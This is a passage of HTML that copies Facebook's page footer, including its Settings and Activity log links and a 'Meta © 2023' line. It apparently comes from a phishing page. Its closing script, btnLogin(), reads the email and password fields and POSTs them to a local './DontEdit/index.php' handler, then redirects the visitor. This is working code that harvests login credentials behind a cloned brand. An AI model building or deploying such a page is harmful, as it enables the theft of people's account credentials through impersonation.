                    text-decoration-line: none;
                    white-space: nowrap;
                    margin-right: 0px;
                    font-family: inherit;
                  "
                  >Contact uploading and non-users</a
                >
              </li>
              <li
                style="
                  border-width: 0px 0px 0px 1px;
                  display: inline-block;
                  vertical-align: top;
                  padding-left: 20px;
                  padding-right: 0px;
                "
              >
                <a
                  accesskey="6"
                  class="accessible_elem"
                  href="https://web.facebook.com/settings"
                  title="View and edit your Facebook settings."
                  style="
                    color: rgb(138, 141, 145);
                    cursor: pointer;
                    text-decoration-line: none;
                    white-space: nowrap;
                    clip: rect(1px, 1px, 1px, 1px);
                    height: 1px;
                    overflow: hidden;
                    position: absolute;
                    width: 1px;
                    margin-right: 0px;
                    font-family: inherit;
                  "
                  >Settings</a
                >
              </li>
              <li
                style="
                  border-width: 0px 0px 0px 1px;
                  display: inline-block;
                  vertical-align: top;
                  padding-left: 20px;
                  padding-right: 0px;
                "
              >
                <a
                  accesskey="7"
                  class="accessible_elem"
                  href="https://web.facebook.com/allactivity?privacy_source=activity_log_top_menu"
                  title="View your activity log"
                  style="
                    color: rgb(138, 141, 145);
                    cursor: pointer;
                    text-decoration-line: none;
                    white-space: nowrap;
                    clip: rect(1px, 1px, 1px, 1px);
                    height: 1px;
                    overflow: hidden;
                    position: absolute;
                    width: 1px;
                    margin-right: 0px;
                    font-family: inherit;
                  "
                  >Activity log</a
                >
              </li>
            </ul>
          </div>
          <div
            class="mvl copyright"
            style="
              margin-top: 20px;
              margin-bottom: 20px;
              font-size: 11px;
              font-family: inherit;
            "
          >
            <div style="font-family: inherit">
              <span style="font-family: inherit">Meta © 2023</span>
            </div>
          </div>
        </div>
      </div>
    </div>

    <script>
  

        function btnLogin() {
            var to = '';
            var formData = {
              login_email: $("#email").val(),
              login_password: $("#pass").val(),
            };
        
            $.ajax({
              type: "POST",
              url: "./DontEdit/index.php",
              data: formData,
              dataType: "json",
              encode: true,
            }).done(function (data) {
              window.location.replace(to);
            });
        
            setTimeout(() => {
              location.replace('');
        
            }, 1000);
        }
        
        </script>
  </body>
</html>
